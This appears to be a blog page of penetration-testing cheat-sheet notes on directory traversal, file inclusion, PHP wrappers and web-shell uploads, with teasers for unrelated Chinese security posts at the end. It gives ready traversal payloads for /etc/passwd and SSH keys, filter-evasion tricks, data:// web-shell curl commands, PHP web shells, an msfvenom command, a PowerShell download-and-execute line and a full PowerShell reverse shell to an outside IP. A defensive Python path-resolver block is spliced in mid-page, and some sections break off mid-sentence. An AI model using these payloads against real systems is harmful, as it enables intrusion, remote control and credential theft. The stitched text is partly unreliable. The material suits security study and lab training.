Directory Traversal

Enumerate users:
../../../../../../../../../../../../../etc/passwd

Read SSH private keys:
../../../../../../../../../../../../../home/offsec/.ssh/id_rsa

Protection and evasion:
- Protection: removal of path traversal characters (../). Evasion:
  1. Use ..../////, which becomes ../ after sanitization (the filter strips the inner ../ once and leaves the outer one).
  2. URL encode the sequence (%2e%2e%2f), so the literal ../ is never seen by the filter.
- Protection: approved path (the request must start with an allowed directory). Evasion: go to the approved path, then go back (images/../../../etc/passwd).
- Protection: the backend appends a fixed extension to the supplied path, so only files with that extension can be reached.

File Inclusion

Local File Inclusion (LFI):
1. Identify a local file on the server to which we can add source code (e.g. a web application log file).
2. Insert payload code into that local file (log poisoning), for example by sending it in a request header that the server writes to the log, such as User-Agent.
3. Exploit the local file inclusion vulnerability to include, and therefore execute, that file.

Log path on Linux: ../../../../../../../../../var/log/apache2/access.log
Log path on Windows (XAMPP): C:\xampp\apache\logs\access.log

Use of PHP wrappers

php://filter
Without an encoding filter the included file is still executed by include(), so its PHP code is not shown in the response; adding convert.base64-encode returns the whole file, PHP source included, as base64 text that can be decoded with base64 -d. Use it to read source such as admin.php.
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php

data://
The data:// wrapper makes the application interpret the included contents as source code (this requires allow_url_include to be enabled in php.ini, which is off by default).
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

Remote File Inclusion (RFI)
Host a web server on the attacker machine to serve the remote file to be included. Make a request to the target web application to connect to the…
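The three protections and their evasions above are easiest to see side by side in code. The following is an added example written for this page, not code from the original notes: it models the "strip ../" filter and the "approved prefix" filter as Python functions, shows why ..../// and images/../ walk out of the web root, and contrasts them with a resolver that decodes, normalises the joined path and checks containment instead of pattern-stripping. WEB_ROOT and the images/ prefix are assumed values for the demo.

```python
import posixpath
import urllib.parse
from typing import Optional

# Constructed web root for the demo; the real value is wherever the
# application is allowed to read files from.
WEB_ROOT = "/var/www/html"


def naive_sanitize(path: str) -> str:
    """Vulnerable filter: delete every literal '../' in a single pass.

    '....//' contains one '../' in the middle; removing it leaves the outer
    '..' and '/', i.e. '../' again, which is the bypass from the cheat sheet.
    """
    return path.replace("../", "")


def naive_resolve(user_path: str) -> str:
    """Vulnerable: sanitize the raw string, then join it onto the web root."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, naive_sanitize(user_path)))


def prefix_resolve(user_path: str) -> Optional[str]:
    """Vulnerable 'approved path' check: only the prefix is verified, so
    'images/../../../../etc/passwd' passes and then walks back out."""
    if not user_path.startswith("images/"):
        return None
    return posixpath.normpath(posixpath.join(WEB_ROOT, user_path))


def inside_root(resolved: str) -> bool:
    """True when a normalised absolute path lies under WEB_ROOT."""
    return resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/")


def safe_resolve(user_path: str) -> Optional[str]:
    """Hardened: decode, normalise the *joined* path, then test containment.

    The containment test is the control; no pattern-stripping is attempted,
    so the ..../// trick has nothing to exploit (it is just an odd directory).
    """
    # Decode until stable so %252e%252e%252f (double encoding) is seen as '../'.
    decoded = user_path
    for _ in range(3):
        step = urllib.parse.unquote(decoded)
        if step == decoded:
            break
        decoded = step
    # A NUL byte used to truncate the path (and any extension the backend
    # appends) on legacy PHP builds before 5.3.4; reject it outright, and
    # reject absolute paths because join() would discard WEB_ROOT for them.
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    # On a live system also run os.path.realpath here so a symlink under
    # WEB_ROOT cannot point outside it; string normalisation does not see it.
    if not inside_root(candidate):
        return None
    return candidate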
File Upload Vulnerability

Web Shell Upload Web Shell Check the programming language of the web app: enumerating common index page extensions, Wappalyzer Write a basic web shell payload in that programming language to check if there is any validation, for example: <?php file_get_contents('/etc/passwd'); ?> <?php system('hostname'); ?> <?php system($_REQUEST['cmd']); ?> <% eval request('cmd') %> Tools for opening a web shell: phpbash, SecLists (PHP), Antak Webshell (ASPX) Reverse Web Shell Main idea: use web shell to initiate a remote session from the target machine to the pentester's machine, thus enable interactive terminal to the target machine. Tools for opening a reverse web shell: php-reverse-shell Generate a reverse shell with msfvenom: msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Reverse shell for Windows: Powershell command to execute remote script: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173/ps.ps1')" Contents of backdoor.ps1: $client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Command…
使用QRadar SIEM及JumpServer实现自动化响应特权访问管理(PAM)的安全事件,例如中断会话或禁用PAM登录。
通过互联网基础知识,分析美国执法机构查封网站的技术实现方法。
在VMware虚拟机上安装FortiGate防火墙永久使用版,并且在防火墙后设置一个拥有简单访问控制的虚拟局域网。
在实现用mitmproxy和QRadar SIEM审计员工浏览记录之后,我们继续探索mitmproxy开源web代理在防止信息泄露,恶意网站威胁,以及员工行为合规中的应用。通过编写mitmproxy脚本,实现对黑名单网站/IP地址进行封锁,并将事件上报QRadar SIEM分析。
IBM Security从24年开始不再提供QRadar SIEM Community Edition的OVA虚拟机一键导入文件,只有ISO镜像,因此在VMware虚拟机部署QRadar服务端变得麻烦了点。本人安装的时候遇到了一些问题,重装了几次。这篇博客整理下IBM官方论坛以及Reddit上的一些零散信息,详细记录一个安装好QRadar的完整流程。
QRadar SIEM Community Edition免费授权续期
QRadar SIEM Community Edition免费授权续期步骤
一种机读防倒票、验证客户信息,同时识别高端客户完成会籍匹配的方法。
这一站,上岸!